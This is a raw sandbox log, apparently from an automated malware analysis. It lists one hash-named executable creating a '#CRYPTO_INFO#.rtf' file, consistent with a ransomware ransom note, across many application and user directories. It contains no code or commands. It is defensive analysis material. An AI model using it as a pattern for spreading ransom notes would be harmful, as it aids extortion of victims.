8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kok\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\w0w630d3.default-release\OfflineCache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\da\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fa\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\Windows Security Health\Logs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\deploy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c0bc1dc0-1468-425e-afda-6181de0eee22}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Videos\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bs-Latn-BA\#CRYPTO_INFO#.rtf 